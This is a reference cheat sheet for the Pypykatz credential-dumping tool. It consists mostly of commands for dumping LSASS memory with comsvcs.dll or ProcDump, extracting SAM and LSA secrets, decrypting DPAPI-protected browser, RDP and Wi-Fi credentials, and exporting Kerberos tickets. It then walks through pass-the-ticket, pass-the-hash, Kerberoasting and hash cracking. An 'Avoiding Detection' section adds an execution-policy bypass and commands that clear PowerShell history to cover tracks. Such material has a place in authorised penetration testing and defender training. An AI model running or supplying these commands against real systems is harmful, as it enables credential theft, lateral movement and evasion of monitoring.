Pypykatz
Pypykatz (by SkelSec) is a pure Python implementation of the core of Mimikatz: LSASS memory parsing, registry hive secrets, DPAPI and Kerberos ticket extraction. Because it is plain Python it runs on any OS, so an LSASS minidump or a set of registry hives copied off a Windows host can be parsed offline on Linux or macOS, and the heavily signatured Mimikatz binary never has to touch the target.
Installation
# Install via pip
pip install pypykatz
# Or clone and install
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
pip install -e .
# Verify installation
pypykatz --version
Basic Usage
| Command | Description |
|---|---|
| pypykatz live lsa | Dump credentials from the LSASS process of the local Windows host (local admin required) |
| pypykatz lsa minidump file.dmp | Parse an LSASS minidump file offline (any OS) |
| pypykatz registry SYSTEM --sam SAM --security SECURITY | Parse exported registry hives; SYSTEM is mandatory because it holds the boot key |
| pypykatz live registry | Read SAM/SECURITY secrets from the live registry (Windows, local admin) |
| pypykatz dpapi prekey / masterkey / credential / blob | Offline DPAPI decryption chain (see DPAPI Decryption) |
| pypykatz --help | Display help menu; every subcommand also accepts --help |
LSASS Credential Extraction
Live LSASS Dumping
# Dump from the live LSASS process (Windows only; requires local admin / SeDebugPrivilege)
pypykatz live lsa
# Useful switches: --json (machine-readable), -g (greppable, one credential per line),
# -o out.txt (write to a file), -k ticketdir (write Kerberos tickets to a directory as .kirbi files)
# Output includes, per logon session:
# - NT hashes and SHA1 password hashes (MSV package)
# - Plaintext passwords where a provider still caches them (WDigest if enabled, TsPkg, CredMan, SSP)
# - Kerberos tickets and session keys
# - DPAPI masterkeys cached in LSASS
Minidump Parsing
# Create a minidump of lsass.exe (Task Manager "Create dump file", Process Explorer, ProcDump, or comsvcs.dll)
tasklist | findstr lsass
# PID: 600 (example value; use the PID printed on your host)
# Generate a full-memory minidump with the built-in comsvcs.dll MiniDump export
# (run from an elevated prompt; the calling process needs SeDebugPrivilege; "full" is required, pypykatz needs the heap)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 600 C:\path\minidump.dmp full
# Alternative with Sysinternals ProcDump
procdump.exe -accepteula -ma lsass.exe C:\path\minidump.dmp
# Copy the dump off the host and parse it with pypykatz (works on Linux/macOS as well)
pypykatz lsa minidump C:\path\minidump.dmp
# Output: the same per-session listing as `live lsa` (hashes, plaintext where cached, tickets)
Registry Hive Parsing
SAM and SYSTEM Hive
# Export hives (requires admin)
reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system
# Parse with pypykatz: SYSTEM is the mandatory positional argument (it holds the boot key
# that decrypts the other hives); SAM and SECURITY are passed as options
pypykatz registry C:\system --sam C:\sam
# Outputs NT hashes for all local accounts in pwdump format (user:rid:lmhash:nthash:::)
Security Hive Parsing
# Export SECURITY hive
reg save HKLM\SECURITY C:\security
# Extract LSA secrets (service account passwords, DPAPI_SYSTEM) and cached domain credentials (DCC2);
# SYSTEM is still required for the boot key
pypykatz registry C:\system --sam C:\sam --security C:\security
# On the target itself the same data can be read without exporting anything:
pypykatz live registry
DPAPI Decryption
Masterkey Extraction
# Locate masterkey files
# Typically: C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>
# Step 1: derive "prekeys" from what you know about the user: password + SID,
# or NT hash + SID (the SID is the directory name in the path above)
pypykatz dpapi prekey password "<SID>" "UserPassword" -o prekeys.txt
pypykatz dpapi prekey nt "<SID>" 8846f7eaee8fb117ad06bdd830b7586c -o prekeys.txt
# Step 2: decrypt the masterkey file with those prekeys; the result is a JSON map of
# masterkey GUID -> key that every later dpapi subcommand consumes
pypykatz dpapi masterkey "C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" prekeys.txt -o mkeys.json
# No password? Masterkeys already unlocked in LSASS can be lifted from a minidump instead
pypykatz dpapi minidump minidump.dmp -o mkeys.json
# Machine-scope masterkeys (services, scheduled tasks) are keyed by the DPAPI_SYSTEM LSA secret
pypykatz dpapi prekey registry C:\system --sam C:\sam --security C:\security -o prekeys.txt
DPAPI Blob Decryption
# Decrypt individual protected items with the masterkeys recovered above (mkeys.json)
# Credential Manager files (%APPDATA%\Microsoft\Credentials\<hex name>)
pypykatz dpapi credential mkeys.json "C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<file>"
# Windows Vault: decrypt the policy file first, then the .vcred entries with the keys it yields
pypykatz dpapi vpol mkeys.json "C:\Users\<user>\AppData\Local\Microsoft\Vault\<GUID>\Policy.vpol"
pypykatz dpapi vcred --help   # takes a .vcred file plus the keys recovered from Policy.vpol
# Any raw DPAPI blob (registry values, application-specific files)
pypykatz dpapi blob mkeys.json blob.bin
# Chrome/Chromium "Local State" key and the databases it protects: pypykatz dpapi chrome --help
# Can extract:
# - Saved browser credentials (Internet Explorer/legacy Edge via the Vault, Chrome via the Local State key)
# - RDP credentials (Credential Manager TERMSRV/ entries)
# - VPN and Wi-Fi credentials (pypykatz dpapi wifi --help)
Kerberos Ticket Extraction
Live Ticket Extraction
# Extract Kerberos tickets from LSASS and write each one to a directory as a .kirbi file
pypykatz live lsa -k C:\tickets
# Same for an offline dump
pypykatz lsa minidump minidump.dmp -k C:\tickets
# Output includes:
# - TGT (Ticket Granting Ticket) of each logon session
# - Service tickets (TGS) cached in that session
# - Ticket lifetimes (start, end, renew-till)
# - Session keys
Ticket Reuse (Pass-the-Ticket)
# Export tickets in Mimikatz .kirbi format (the -k directory option), then inject one on another host
pypykatz live lsa -k C:\tickets
# Use with Rubeus or Mimikatz
Rubeus.exe ptt /ticket:C:\tickets\<file>.kirbi
# Mimikatz equivalent: kerberos::ptt C:\tickets\<file>.kirbi
Credential Formats
NTLM Hash Format
Username:RID:LMHash:NTHash:::   (pwdump style, as printed by pypykatz registry)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
# aad3b435... is the "empty" LM hash (LM storage disabled); 8846f7... is the NT hash of "password"
Plaintext Passwords
Domain\Username:Password
DOMAIN\admin:P@ssw0rd123
Kerberos Tickets
Each logon session in the LSASS output carries a == Kerberos == block with the username, domain and the tickets cached for that session; with -k every ticket is additionally written to <dir>\<name>.kirbi, the same KRB-CRED encoding Mimikatz and Rubeus consume.
Advanced Usage
JSON Output
# Output credentials in JSON format (the flag is --json; -o writes to a file instead of stdout)
pypykatz live lsa --json -o creds.json
pypykatz lsa minidump minidump.dmp --json -o creds.json
# The document is keyed by dump name; each logon session sits under logon_sessions with
# per-package lists such as msv_creds (NThash) and wdigest_creds (password)
jq -r '.[].logon_sessions[] | .msv_creds[] | "\(.domainname)\\\(.username):\(.NThash)"' creds.json
Encrypted LSASS Memory (LsaProtectMemory)
# LSASS keeps cached secrets encrypted in memory (3DES/AES keys and IV held inside lsasrv.dll)
# Pypykatz, like Mimikatz, locates those keys in the dump and decrypts the secrets itself,
# so such dumps parse normally with no extra option
pypykatz lsa minidump dump.dmp
# This is not Credential Guard: with Credential Guard the secrets live in LSAIso (VSM) and a
# dump of lsass.exe yields no NT hashes or Kerberos keys (see Limitations)
Multiple Dump Analysis
# Parse multiple minidumps and consolidate results (--json -o per dump is easier to post-process)
for dump in *.dmp; do
pypykatz lsa minidump "$dump" >> all_creds.txt
done
# Or point pypykatz at a directory: -d parses every dump in it, -r recurses
pypykatz lsa minidump ./dumps -d -r
Operational Security Considerations
Avoiding Detection
# Live mode needs a Python interpreter plus the pypykatz package on the target, which is itself
# a loud artifact. The quieter pattern is to create the dump on the target with a built-in or
# signed tool (Task Manager, comsvcs.dll, ProcDump) and run pypykatz on the attacker machine
# against the copied dump, so no credential-parsing code executes on the host at all.
# If pypykatz must run there, invoke it as a module from an existing interpreter rather than
# installing a console script:
powershell -NoProfile -ExecutionPolicy Bypass -Command "& {$env:PYTHONIOENCODING='utf-8'; python -m pypykatz live lsa}"
# What EDR alerts on is the handle opened to lsass.exe (Sysmon Event ID 10 with lsass.exe as
# TargetImage), whatever the name of the process opening it; renaming python.exe does not change that.
# Clear PowerShell history on the way out
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePath
Credential Handling
# Use the Python API instead of shelling out, so parsed credentials stay in memory
from pypykatz.pypykatz import pypykatz

# Same parsing as `pypykatz lsa minidump`; attribute names match the --json field names
mimi = pypykatz.parse_minidump_file("minidump.dmp")
for luid, session in mimi.logon_sessions.items():
    for cred in session.msv_creds:
        if cred.NThash:
            print(f"{cred.domainname}\\{cred.username}:{cred.NThash.hex()}")
# mimi.to_dict() / mimi.to_json() give the same structure as --json
# Never write plaintext to disk unless the engagement requires it; keep results in memory,
# and delete dump files from the target once they have been copied off
Exploitation Examples
NTLM Hashes: Pass-the-Hash, Not Relay
# 1. Dump NT hashes with pypykatz in greppable form (one credential per line)
pypykatz live lsa -g
# 2. A dumped NT hash is reused directly via pass-the-hash (next section) or given to
#    secretsdump.py / psexec.py with -hashes; it is not an input to NTLM relay
# 3. NTLM relay (responder -I eth0 plus ntlmrelayx.py -t <target>) forwards a live
#    authentication coerced from a victim and needs no dumped hash; the two are separate techniques
Kerberoasting
# 1. Export the service tickets (TGS) cached in LSASS as .kirbi files
pypykatz live lsa -k C:\tickets
# 2. A TGS is encrypted with the service account's key, so it cracks like a Kerberoast
#    response once converted to hashcat format (kirbi2john.py ships with John the Ripper)
kirbi2john.py C:\tickets\<file>.kirbi > tickets.txt
# 3. Crack: -m 13100 for RC4 (etype 23) tickets, -m 19700 for AES256 (etype 18)
hashcat -m 13100 tickets.txt wordlist.txt
Pass-the-Hash
# 1. Extract NT hashes (greppable output)
pypykatz live lsa -g
# 2. Use with PtH tools; impacket takes LMHASH:NTHASH, and an empty LM part is fine
psexec.py -hashes ":<nthash>" domain/user@target cmd.exe
Limitations
- Live LSASS access requires local admin (SeDebugPrivilege); live mode is Windows-only
- A minidump must be created by a process holding that privilege and must be a full-memory dump
- Credential Guard (LSAIso running in Virtual Secure Mode) keeps the secrets outside lsass.exe; a dump then yields no NT hashes or Kerberos keys
- Registry parsing needs exported SAM/SYSTEM/SECURITY hives (admin to export) or admin on the live host; SYSTEM is always needed for the boot key
- DPAPI decryption requires the user's password or NT hash plus SID, a masterkey lifted from LSASS, or the DPAPI_SYSTEM secret for machine-scope keys
Alternatives
- Mimikatz: Original credential extraction tool
- Rubeus: Kerberos-focused credential extraction
- Secretsdump (impacket): remote dumping of SAM, LSA secrets and NTDS via the remote registry and DRSUAPI
- Get-GPPPassword: Group Policy Preferences password extraction
- LaZagne: Password recovery from various applications
Credential Dumping Checklist
# Comprehensive credential extraction:
# 1. LSASS (live on the host, or from a minidump offline)
pypykatz live lsa --json -o lsa.json
pypykatz lsa minidump minidump.dmp --json -o lsa.json
# 2. Registry hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM sys.hive
reg save HKLM\SECURITY sec.hive
pypykatz registry sys.hive --sam sam.hive --security sec.hive
# 3. DPAPI credentials (prekey -> masterkey -> credential/blob, see DPAPI Decryption)
pypykatz dpapi prekey ...
pypykatz dpapi masterkey ...
pypykatz dpapi credential ...
# 4. Kerberos tickets (written as .kirbi files next to step 1)
pypykatz live lsa -k tickets
# 5. Consolidate and crack (user:nthash lines; -m 1000 is NTLM)
hashcat -m 1000 --username hashes.txt wordlist.txt
Last updated: March 2025 | GitHub: https://github.com/skelsec/pypykatz